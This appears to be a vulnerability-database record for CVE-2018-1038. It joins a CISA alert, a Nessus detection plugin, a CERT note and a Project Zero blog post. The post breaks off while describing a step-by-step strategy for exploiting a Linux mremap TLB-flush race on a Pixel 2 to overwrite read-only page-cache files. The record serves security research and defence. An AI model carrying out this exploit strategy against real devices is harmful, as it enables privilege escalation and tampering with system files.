Advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1038>) for more information and apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ncas/current-activity/2018/03/29/Microsoft-Release-Patch-Windows-7-and-Windows-Server-2008-R2>); we'd welcome your feedback.\n", "modified": "2018-03-29T00:00:00", "published": "2018-03-29T00:00:00", "id": "CISA:3D3E239B3E90E3844001DB05F0A3EA02", "href": "https://us-cert.cisa.gov/ncas/current-activity/2018/03/29/Microsoft-Release-Patch-Windows-7-and-Windows-Server-2008-R2", "type": "cisa", "title": "Microsoft Release Patch for Windows 7 and Windows Server 2008 R2 Systems", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-08-18T04:54:23", "description": "The remote Windows host is missing security update 4100480. It is,\ntherefore, affected by an elevation of privilege vulnerability that\nexists when the Windows kernel fails to properly handle objects in\nmemory. An attacker who successfully exploited this vulnerability\ncould run arbitrary code in kernel mode. An attacker could then\ninstall programs; view, change, or delete data; or create new\naccounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log\non to the system. An attacker could then run a specially crafted\napplication to take control of an affected system. ", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-30T00:00:00", "title": "KB4100480: Windows Kernel Elevation of Privilege Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1038"], "modified": "2018-03-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS18_MAR_4100480.NASL", "href": "https://www.tenable.com/plugins/nessus/108757", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108757);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/17\");\n\n script_cve_id(\"CVE-2018-1038\");\n script_xref(name:\"MSKB\", value:\"4100480\");\n script_xref(name:\"MSFT\", value:\"MS18-4100480\");\n\n script_name(english:\"KB4100480: Windows Kernel Elevation of Privilege Vulnerability\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by elevation of privilege vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4100480. It is,\ntherefore, affected by an elevation of privilege vulnerability that\nexists when the Windows kernel fails to properly handle objects in\nmemory. An attacker who successfully exploited this vulnerability\ncould run arbitrary code in kernel mode. An attacker could then\ninstall programs; view, change, or delete data; or create new\naccounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log\non to the system. An attacker could then run a specially crafted\napplication to take control of an affected system. \");\n # https://support.microsoft.com/en-us/help/4100480/windows-kernel-update-for-cve-2018-1038\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0a34a061\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blog.frizk.net/2018/03/total-meltdown.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/ufrisk/pcileech\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply KB4100480.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-1038\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\narch = get_kb_item_or_exit('SMB/ARCH');\nif (arch != \"x64\") audit(AUDIT_ARCH_NOT, \"x64\", arch);\n\nbulletin = \"MS18-03\";\nkbs = make_list('4100480');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n# 4100480 got superseded by a sec only update, 4093108\nif (get_kb_item(\"smb_rollup/04_2018/sec\") == \"4093108\") audit(AUDIT_HOST_NOT, \"affected\");\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"03_2018_3\",\n bulletin:bulletin,\n rollup_kb_list:[4100480])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:44:09", "bulletinFamily": "info", "cvelist": ["CVE-2018-1038"], "description": "### Overview \n\nWhen the Microsoft [update for meltdown](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV180002>) is installed on a Windows 7 x64 or Windows Server 2008 R2 x64 system, an unprivileged process may be able to read and write the entire memory space available to the Windows kernel.\n\n### Description \n\nThe update that Microsoft has released for [meltdown](<https://www.kb.cert.org/vuls/id/584653>) on x64 versions of Windows 7 and Windows Server 2008 R2 incorrectly sets the permission bit for memory accessible from unprivileged user space. As a result, such platforms that have the meltdown update installed, which was released in January 2018 will not properly protect the contents of system memory.. \n \n--- \n \n### Impact \n\nAn attacker with the ability to run code on an affected platform as an unprivileged user may be able to read from and write to the entire contents of system memory. Exploit code that uses this vulnerability to escalate privileges from an unprivileged user to SYSTEM privileges is publicly available. \n \n--- \n \n### Solution \n\n**Apply an update**\n\nThis issue is addressed in the [Microsoft update for CVE-2018-1038](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1038>). \n \n--- \n \n### Vendor Information\n\n277400\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft Affected\n\nUpdated: March 29, 2018 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1038>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 6.8 | AV:L/AC:L/Au:S/C:C/I:C/A:C \nTemporal | 5.9 | E:H/RL:OF/RC:C \nEnvironmental | 5.9 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://blog.frizk.net/2018/03/total-meltdown.html>\n * <https://blog.xpnsec.com/total-meltdown-cve-2018-1038/>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1038>\n\n### Acknowledgements\n\nThis vulnerability was publicly reported by Ulf Frisk.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2018-1038](<http://web.nvd.nist.gov/vuln/detail/CVE-2018-1038>) \n---|--- \n**Date Public:** | 2018-03-27 \n**Date First Published:** | 2018-03-29 \n**Date Last Updated: ** | 2018-04-24 14:47 UTC \n**Document Revision: ** | 25 \n", "modified": "2018-04-24T14:47:00", "published": "2018-03-29T00:00:00", "id": "VU:277400", "href": "https://www.kb.cert.org/vuls/id/277400", "type": "cert", "title": "Windows 7 and Windows Server 2008 R2 x64 fail to protect kernel memory when the Microsoft update for meltdown is installed", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:22:16", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195", "CVE-2017-15588", "CVE-2018-1038", "CVE-2018-18281"], "description": "Posted by Jann Horn, Project Zero\n\n \n\n\nThis is a technical blog post about TLB flushing bugs in kernels, intended for people interested in kernel security and memory management.\n\n# Introduction: Bugs in Memory Management code\n\nThere have been some pretty scary bugs in memory management in the past, like:\n\n** \n**\n\n * [CVE-2016-5195](<https://dirtycow.ninja/>), a logic bug in the Linux kernel that permitted writing to shared read-only pages\n\n * [CVE-2018-1038](<http://blog.frizk.net/2018/03/total-meltdown.html>), a Windows bug that existed for about two months, where a bit was set incorrectly in a page table, permitting userspace to overwrite page tables\n\n** \n**\n\nMemory management is one of the core functions that every kernel and hypervisor needs to implement; and the correctness of memory management code is very important to the security of the entire system. I hope that this post encourages more researchers to look at memory management code and demonstrates that memory management code can have issues with high security impact that fall somewhat outside of the typical security bug patterns.\n\n** \n**\n\nThis blog post focuses on memory management bugs related to TLB flushing. Such bugs can, if the timing works out for the attacker, provide very strong exploitation primitives for local attacks; and they are hard to discover unless you are manually looking for them. They are probably not a big bug class, but occasionally, bugs in TLB flushing logic do happen.\n\n** \n**\n\nHere are the bugs related to TLB flushing that I have (co-)discovered:\n\n** \n**\n\n * Xen PV: [XSA-241](<https://xenbits.xen.org/xsa/advisory-241.html>): \"Stale TLB entry due to page type release race\" (CVE-2017-15588) (security impact discovered by Xen security team)\n\n * Linux: insufficient shootdown for paging-structure caches ([link](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1633>))\n\n * gVisor: pagetable reuse across levels without paging-structure invalidation ([link](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1674>))\n\n * [XNU: pmap_flush() omits TLB flushes on machines with &gt;32 logical CPU cores ([link](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1716>)) - this was already fixed in a binary release when I reported it, so it doesn't really count]\n\n * Linux: mremap() TLB flush too late with concurrent ftruncate() ([link](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1695>)) (CVE-2018-18281)\n\n** \n**\n\nThis blog post focuses on the last bug in the list.\n\n** \n**\n\nBy the way: Note that the gVisor bug is in memory management code written in Go, which is memory-safe[-ish](<https://blog.stalkr.net/2015/04/golang-data-races-to-break-memory-safety.html>). This demonstrates that in operating system code, \"logic bugs\" in some places, like page table management, can have consequences that are as severe as those of classical memory safety issues, and are not in the scope of the language's safety guarantees. Of course, memory-safe languages are still highly useful because they (should) prevent bugs in random, non-critical pieces of kernel code from corrupting completely unrelated system state, and they allow reviewers to spend more time on the security-critical parts of the system.\n\n# Introduction: TLBs and paging-structure caches\n\nIf you know what a TLB is, what a TLB flush is, what paging-structure caches are, and how paging-structure caches are managed, you can skip this section. This section does not exhaustively describe the topic of TLB management; in particular, it doesn't deal with processor features like global page table entries and PCID/ASID.\n\n** \n**\n\nPage tables contain information on how virtual addresses map to physical ones. Page tables are stored in memory, so they are comparatively slow to access; to make address translation fast, CPUs use caches. The classic caches for this are called Translation Lookaside Buffers (TLBs); they cache mappings from virtual to physical page addresses (including mappings for huge pages), or in other words, they (more or less) cache last-level page table entries. (Modern CPU cores often have multiple TLBs with different responsibilities, e.g. Intel CPUs have an instruction TLB, a data TLB and a shared L2 TLB.) TLB parameters are usually fairly well-documented; for example:\n\n** \n**\n\n * Intel's [Optimization Reference Manual](<https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf>) has information about TLB structure in the \"Cache and Memory Subsystem\" subsections for various processor generations\n\n * Arm documents the TLB parameters of their cores in [their processor documentation](<http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.set.cortexa/index.html>), in the Technical Reference Manual for the core, under \"Memory Management Unit &gt; TLB organization\".\n\n * AMD publishes TLB parameters in their [Software Optimization Guides](<https://developer.amd.com/resources/developer-guides-manuals/>).\n\n** \n**\n\nPaging-structure caches are usually less well-documented; but there is official documentation about their existence and necessary precautions when dealing with them. Intel calls them \"Paging-Structure Caches\", Arm calls them \"Intermediate table walk caches\", AMD documents them as part of the L2 data TLB (at least for 17h processors). Paging-structure caches store copies of non-last-level page table entries; they are used when a virtual address without a corresponding TLB entry is being accessed, and they reduce the number of memory accesses for a page table walk. There are some reverse-engineered details about the paging-structure caches of various processors in [a VUSec paper](<https://www.cs.vu.nl/~herbertb/download/papers/revanc_ir-cs-77.pdf>) (in Table 1).\n\n** \n**\n\nIt generally has to be assumed that entries in TLBs and paging-structure caches can be evicted by the processor whenever it wants to. Similarly, it has to be assumed that a processor can create entries in TLBs and paging-structure caches from page table entries whenever it wants to, because memory accesses in speculatively executed code can create such entries.\n\n** \n**\n\nMechanisms to invalidate TLB entries and paging-structure caches differ between processor architectures:\n\n** \n**\n\nX86 provides instructions to invalidate either individual TLB entries for the current logical CPU core, or to invalidate the entire TLB (either with or without global entries) for the current logical CPU core. Invalidating the TLB entry for a virtual address also at least implies invalidation of any paging-structure cache entries that could be used for translating that virtual address. The Intel SDM documents this in volume 3A, chapter 4.10.4 (\"Invalidation of TLBs and Paging-Structure Caches\"). (The SDM says that INVLPG invalidates all paging-structure caches, but doesn't make such broad guarantees for individual-address INVPCID as far as I can tell.) To perform TLB invalidation across logical CPU cores, an operating system has to manually run code that invalidates TLB entries on each logical CPU core; this is normally implemented by sending Inter-Processor Interrupts (via APIC) from the processor that wants to perform a TLB invalidation to all other processors that might have relevant stale TLB or paging-structure cache entries.\n\n** \n**\n\nThe ARM architecture provides magic instructions that can perform cross-core TLB invalidation for you; however, if you also need to synchronize against page table walks implemented in software (like the Linux kernel), you may have to send IPIs anyway (depending on the synchronization mechanism used for page table walks).\n\n** \n**\n\nThe general code pattern for performing cache invalidations for page table entries is:\n\n** \n**\n\n 1. Remove an entry from a page table, but keep holding a reference to the physical page it points to.\n\n 2. Perform a TLB flush (either for a specific address, or for the entire address space) across all cores that might be using the same page tables as the current thread.\n\n 3. Drop the reference that was held on the physical page, potentially freeing it.\n\n** \n**\n\nThis pattern is the same both when unmapping normal data pages and when removing page tables. It can often be batched for better performance - first remove multiple page table entries, then do one TLB flush across cores, then drop all the page references -, but for the mapping of an individual page (including page tables), this pattern is generally true.\n\n** \n**\n\nOn X86 (but ARM64 is similar), there are two bits in a last-level PTE which the CPU can write into as part of address translation: The Accessed bit specifies whether the CPU has ever used the page table entry for address translation; in other words, if the Accessed bit is unset, the value of the page table entry has not been cached by the TLB since the last time the page table entry was written by software. The Dirty bit specifies whether the CPU has ever used the page table entry for a writing memory access; in other words, if the Dirty bit is unset, no TLB entries that can be used to write to the physical page have been created since the last software write to the PTE.\n\n# Linux: mremap() TLB flush too late\n\n## The bug\n\nOn Linux, memory management data structures of a process are protected by multiple locks; in particular, the read/write semaphore mmap_sem in struct mm_struct is used to protect the VMA (virtual memory area) structures, and page table locks (if the kernel is configured normally, implemented using per-page-table spinlocks for lower-level page tables) are used to protect access to page tables. Accesses to the page tables of a process for syscalls such as mmap()/mremap()/munmap(), as well as syscalls for page fault handling, use both the mmap_sem and page table locks. However, some other types of page table access (e.g. operations on all places across the system where a given file is mapped, like an ftruncate() syscall that shrinks a file and frees pages beyond the new end of the file) don't hold the mmap_sem and only use page table locks.\n\n** \n**\n\nThe mremap() syscall allows userspace to move a VMA and its associated page table entries. This syscall moves page tables via mremap_to() -&gt; move_vma() -&gt; move_page_tables() -&gt; move_ptes(). The move_ptes() function implemented roughly the following logic for moving entries between two L1 page tables, with only the mmap_sem held initially (locked in exclusive mode):\n\n** \n**\n\n 1. (Take reverse map locks in some cases if the new VMA has been merged into an adjacent VMA.)\n\n 2. Take page table locks on the old and new page tables.\n\n 3. (Do a TLB flush if the direct reclaim path is in the middle of stealing some pages from the current process.)\n\n 4. For each non-empty entry in the relevant range of the current source page table:\n\n 1. Atomically read the current value of the page table entry and clear it (using ptep_get_and_clear(), which e.g. on X86 boils down to a LOCK XCHG).\n\n 2. If the read page table entry is Dirty, set the local force_flush flag to true.\n\n 3. Write the read page table entry into the page table for the new mapping.\n\n 5. Unlock the new page table.\n\n 6. If the force_flush flag was set, perform a TLB flush on the old page table entries that were accessed in step 4.\n\n 7. Unlock the old page table.\n\n 8. (Drop reverse map locks if they were taken.)\n\n 9. If the force_flush flag wasn't set, signal to the caller move_page_tables() that a TLB flush is required.\n\n** \n**\n\nLater, after iterating over multiple page tables, move_page_tables() then performs a TLB flush on the old address range if requested. \n\n** \n**\n\nmove_ptes() needs to ensure that, when it releases the old page table's reference, there can be no more stale TLB entries. There is nothing in move_ptes() that explicitly drops a reference, but move_ptes() moves the reference into the new page table entry. While the page table locks on the new page table are held, other tasks running concurrently can't yet remove the new page table entry and drop its reference, so things are still fine after step 4c - the page can't be freed. But after step 5, another task can theoretically race with mremap() and drop the page. This is long before move_page_tables() performs the relevant TLB flush on the old address range (this is the bug I reported), and also slightly before the TLB flush is performed in the force_flush case (I didn't notice that, but the kernel security team did).\n\n** \n**\n\nOn modern kernels, the big race window only works for non-Dirty page table entries - in other words, the big race window can only be used for use-after-free reads, not use-after-free writes. However, before [commit 5d1904204c99](<https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5d1904204c99>) (from November 2016, first in v4.9), the special case for Dirty page table entries did not exist, and the big race window was also usable for use-after-free writes.\n\n** \n**\n\nAlmost everyone is using kernel versions &gt;=4.9 nowadays - for example, [Debian stable ships a kernel based on 4.9](<https://packages.debian.org/search?suite=stretch&searchon=names&keywords=linux-image-amd64>). But there are some exceptions: RHEL [still ships 3.10-based kernels](<https://access.redhat.com/articles/3078>), and many Android devices are based on kernels older than 4.9. For example, the kernel branches used by Google's Pixel phones are:\n\n** \n**\n\n * Google Pixel: 3.18\n\n * Google Pixel 2: 4.4\n\n * Google Pixel 3: 4.9\n\n** \n**\n\nI decided to write an exploit for Google's Pixel 2.\n\n## Locks and preemption\n\nThis section, along with the following one, describes some background that will be useful for developing an exploit strategy.\n\n** \n**\n\nThe Linux kernel supports three different models for preemption of kernel code, one of which has to be selected at build time:\n\n** \n**\n\n * CONFIG_PREEMPT_NONE (\"No Forced Preemption (Server)\")\n\n * CONFIG_PREEMPT_VOLUNTARY (\"Voluntary Kernel Preemption (Desktop)\")\n\n * CONFIG_PREEMPT (\"Preemptible Kernel (Low-Latency Desktop)\")\n\n** \n**\n\n(More preemption types [are coming](<https://www.youtube.com/watch?v=BxJm-Ujipcg>) with the realtime patchset, but that hasn't landed yet.)\n\n** \n**\n\nThe preemption model determines what happens when the kernel wishes to interrupt a task that is currently running kernel code - e.g. because a task with higher priority has become runnable and is waiting to be scheduled.\n\n** \n**\n\nThe Pixel 2 uses a kernel configured with CONFIG_PREEMPT. This means that by default, kernel code can be interrupted at any point during its execution. This even works while a task is holding a mutex, while it is holding a semaphore, or while it is in an RCU read-side critical section (depending on kernel configuration). Only something like a spinlock actually suppresses preemption.\n\n** \n**\n\nAs an attacker, we would like to make the race window between the time move_ptes() drops the page table lock and the time the TLB flush occurs in move_page_tables() as big as possible. Here, it is very useful for us that kernel code is preemptible: Because only the mmap_sem is held across the race window, and the mmap_sem does not inhibit preemption, we can potentially convince the scheduler to kick the task off the CPU core while it is in the middle of the race window, and then keep the task off the CPU for an amount of time on the order of milliseconds.\n\n** \n**\n\nThe kernel allows us to set the affinity of our tasks (the list of CPU cores on which a task is allowed to run), and it also allows us to set various scheduler parameters that control the relative priority of our tasks. This means that we can use affinity masks to pin multiple processes we own together onto a single CPU core, with different priorities - meaning that waking up the higher-priority task implies preemption of the lower-priority one. In this case, by assigning the SCHED_IDLE priority to the task running mremap(), pinning it together with a task that has normal priority and is blocking on a read() from a pipe, and then writing to the other side of that pipe in the right moment, we can preempt the mremap() syscall.\n\n** \n**\n\nTo know the right moment for calling write() on the other end of the pipe, we can abuse procfs. The procfs file /proc/&lt;pid&gt;/status contains various fields about the memory use of a process, including the VmPTE field, which shows the amount of memory consumed by the page tables of a process. By busy-polling the status file and monitoring the VmPTE field, it is possible to detect the page table allocations performed by the mremap() syscall.\n\n## The page allocator\n\nThe Linux page allocator is based on a [buddy allocator](<https://en.wikipedia.org/wiki/Buddy_memory_allocation>), implemented in [mm/page_alloc.c](<https://elixir.bootlin.com/linux/latest/source/mm/page_alloc.c>). This allocator tracks free pages of different orders; an order-n page is 212+n bytes big and is aligned to a 212+n-byte boundary (assuming that the system is using a native page size of 212 bytes).\n\n** \n**\n\nPage freelists are not just per-order, but also per-zone, per-migration-type and (on NUMA systems, which isn't relevant for Android phones) per-node.\n\n** \n**\n\nThe zone specifies in which ways a page can be used; pages stay associated with a single zone. The following zones can exist; bold text indicates that the zone actually exists on the Pixel 2:\n\n** \n**\n\n * ZONE_DMA: like ZONE_NORMAL, but can also be used for DMA with devices that can only address a small subset of physical memory (used by arm64 before kernel 4.16)\n\n * ZONE_DMA32: like ZONE_NORMAL, but can also be used for DMA with devices that can only use 32-bit physical addresses (used by arm64 since kernel 4.16)\n\n * ZONE_NORMAL: can be used for normal kernel memory allocations and as userspace memory; page is mapped in the linear mapping\n\n * ZONE_HIGHMEM: Can only be used for special types of kernel memory allocations and as userspace memory; page is not mapped in the linear mapping. This doesn't exist on arm64, since virtual memory is large enough to map all physical memory.\n\n * ZONE_MOVABLE: manually reserved for pages that the kernel can (usually) move to a different physical address when needed (basically, userspace memory); this [enables limited memory hotplugging](<https://events.static.linuxfound.org/sites/events/files/lcjp13_ishimatsu.pdf>) and [reduces fragmentation (which can help with the allocation of hugepages)](<https://lwn.net/Articles/219589/>); the Pixel 2 doesn't seem to be using this\n\n * ZONE_DEVICE: [something about persistent memory?](<https://lwn.net/Articles/717555/>) \\- arm64 never uses this\n\n** \n** \n\n\nThe migration type of a page specifies either what kind of allocation the page is currently being used for (if the page is currently in use) or what kind of allocation the page should preferably be used for (if the page is free); the intent is to cluster pages that the kernel can reclaim by moving their contents together, allowing the kernel to later create high-order free pages by moving data out of the way. The following migration types exist:\n\n** \n**\n\n * MIGRATE_UNMOVABLE: for allocations that can't simply be removed from their physical page whenever the kernel wants to have the page for something else - e.g. normal kmalloc() allocations\n\n * MIGRATE_MOVABLE: for data that the kernel can (usually) simply move to another physical page - e.g. userspace memory\n\n * MIGRATE_RECLAIMABLE: for allocations that the kernel can't simply move to a different address, but that the kernel can free if necessary to free up some memory\n\n * MIGRATE_HIGHATOMIC: [something about memory reserves for high-order page allocator calls that shouldn't fail but also can't wait for pages to be freed?](<https://lwn.net/Articles/658081/>)\n\n * MIGRATE_CMA: [special memory reserves for contiguous memory for DMA](<https://lwn.net/Articles/486301/>), can only be used for specific DMA allocations and for movable allocations\n\n * MIGRATE_ISOLATE: no allocations are possible - used for purposes like memory hot-removal and blacklisting of defective RAM at runtime\n\n** \n**\n\nThe first two or three of these are the most relevant ones - the rest are kinda special.\n\n** \n**\n\nThe page allocator also has per-cpu, per-zone, per-migratetype freelists as a performance optimization. These only contain order-0 pages. In kernel versions &lt;4.15, one annoying thing about the per-cpu freelists is that they can be accessed from both sides. Normal freelist accesses push and pop on the same end so that pages coming from the freelist are more likely to be in the CPU cache; but when freeing pages that are expected to be cache-cold, and when allocating pages that have to wait for DMA before they are written to the first time, old kernel versions access the freelist from the other end.\n\n** \n**\n\nThe algorithm for allocating pages via get_page_from_freelist(), before entering the slowpath, works roughly as follows (ignoring things like NUMA and atomic/realtime allocations):\n\n** \n**\n\n * For each zone (from the most preferred zone to the least preferred zone); in other words, on the Pixel 2, when allocating non-DMA memory, first for ZONE_NORMAL, then for ZONE_DMA:\n\n * rmqueue_pcplist(): If we want an order-0 page, attempt to allocate from the per-cpu freelist for the current zone and our preferred migratetype. If this freelist is empty, try to refill it by looking through the per-order freelists for the current zone and our preferred migratetype, starting at order 0, iterating through the freelists with increasing order (standard buddy allocator behavior).\n\n * Attempt to allocate from the buddy allocator directly, by iterating through the per-order freelists for the current zone and our preferred migratetype with increasing order.\n\n * If we want a movable page, attempt to allocate from MIGRATE_CMA memory instead.\n\n * __rmqueue_fallback(): Tries to grab a free block of maximum order from a freelist with a different migration type, then potentially changes that block's migration type to the desired one.\n\n** \n**\n\nFor an attacker attempting to exploit a use-after-free at the page allocator level, this means that getting the kernel to reallocate a movable page for an unmovable allocation, or the other way around, requires creating memory pressure that forces the buddy allocator to go through __rmqueue_fallback() and steal pages from a different migration type.\n\n## Exploit strategy\n\nFor exploiting the TLB invalidation race, we want to quickly reallocate the freed movable page from the page cache. Preferably we'll do this through a per-cpu freelist, so it is probably easier to have it reallocated as a movable page instead of forcing a migratetype change. With this strategy, we can't attack things like normal kernel memory allocations or page tables, but we can attack the page cache and anonymous userspace memory. I chose to poison page cache memory, since I wanted to avoid having other userspace processes in the critical timing path of the attack.\n\n** \n**\n\nThis means that at a high level, to perform the attack, we need to pick a victim file page (in other words, a page-aligned and page-sized area in a file) that we want to corrupt, in a file to which we have read-only access (e.g. a shared library containing executable code). Then, we need to poison the page cache entry for the victim file page by running roughly the following steps in a loop:\n\n** \n**\n\n 1. Somehow evict the victim file page from the page cache.\n\n 2. Allocate a set of file-backed pages (e.g. by writing to a memfd), and map them as mapping A.\n\n 3. Trigger the mremap/ftruncate race to free the file-backed pages without removing the corresponding TLB entries for mapping A.\n\n 4. Start a read from the victim page, causing the kernel to reallocate one of the freed pages as the page cache entry for the victim page.\n\n 5. Poll the contents of pages in mapping A (through the stale TLB entries) until one of them contains the victim page. If a page fault occurs before that, go back to step 1.\n\n 6. At this point, we have a stale TLB entry translating the old mapping A to the victim page. Therefore, we can now repeatedly overwrite the victim page through mapping A. (In theory, it seems like a single overwrite should be sufficient; but in practice, that doesn't seem to work. I'm not sure whether this is caused by some sort of cache inconsistency (because memory is concurrently written via DMA and by software), or whether I did something else wrong.)\n\n** \n** \n\n\nOn kernels &lt;4.15, because of the annoying two-sided behavior of the per-cpu freelist, when a new physical page is allocated to store the victim page, it comes from the \"cold\" end of the per-cpu freelist; so instead of simply pushing a page with a stale TLB entry onto the per-cpu freelist and letting the kernel use it for the victim page, it is necessary to quickly push enough pages with stale TLB entries to force the kernel to move all existing per-cpu freelist entries to the global freelist.\n\n## Forcing page cache reloads\n\nThis section focuses on the first step of the exploit strategy, evicting the victim page from the page cache.\n\n** \n**\n\nPublic prior research on this topic that I used for my PoC is [https://arxiv.org/abs/1710.00551](<https://arxiv.org/abs/1710.00551>) (\"Another Flip in the Wall of Rowhammer Defenses\"), which uses page cache eviction as a mechanism to repeatedly move file-backed pages to different physical pages. This paper says in section VIII-B:\n\n** \n**\n\nA fundamental observation we made is that the replacement algorithm of the Linux page cache prioritizes eviction of nonexecutable pages over executable pages.\n\n** \n**\n\nIn shrink_active_list() and page_check_references() in mm/vmscan.c, you can see that file-backed executable pages indeed get special handling:\n\n** \n**\n\nstatic void shrink_active_list(unsigned long nr_to_scan,\n\nstruct lruvec *lruvec,\n\nstruct scan_control *sc,\n\nenum lru_list lru)\n\n{\n\n[...]\n\n/*\n\n* Identify referenced, file-backed active pages and\n\n* give them one more trip around the active list. So\n\n* that executable code get better chances to stay in\n\n* memory under moderate memory pressure. Anon pages\n\n* are not likely to be evicted by use-once streaming\n\n* IO, plus JVM can create lots of anon VM_EXEC pages,\n\n* so we ignore them here.\n\n*/\n\nif ((vm_flags &amp; VM_EXEC) &amp;&amp; page_is_file_cache(page)) {\n\nlist_add(&amp;page-&gt;lru, &amp;l_active);\n\ncontinue;\n\n}\n\n[...]\n\n}\n\n[...]\n\nstatic enum page_references page_check_references(struct page *page,\n\nstruct scan_control *sc)\n\n{\n\n[...]\n\n/*\n\n* Activate file-backed executable pages after first usage.\n\n*/\n\nif (vm_flags &amp; VM_EXEC)\n\nreturn PAGEREF_ACTIVATE;\n\n** \n**\n\nreturn PAGEREF_KEEP;\n\n[...]\n\n}\n\n** \n**\n\nTherefore, executable file-backed pages are used to create memory pressure to evict the victim page.\n\n** \n**\n\nFor this attack, it is also desirable that the victim page, once evicted, is not reloaded from disk until it is accessed the next time. This is not always the case: The kernel has some readahead logic that, depending on the observed memory access pattern, may read large amounts of data (up to 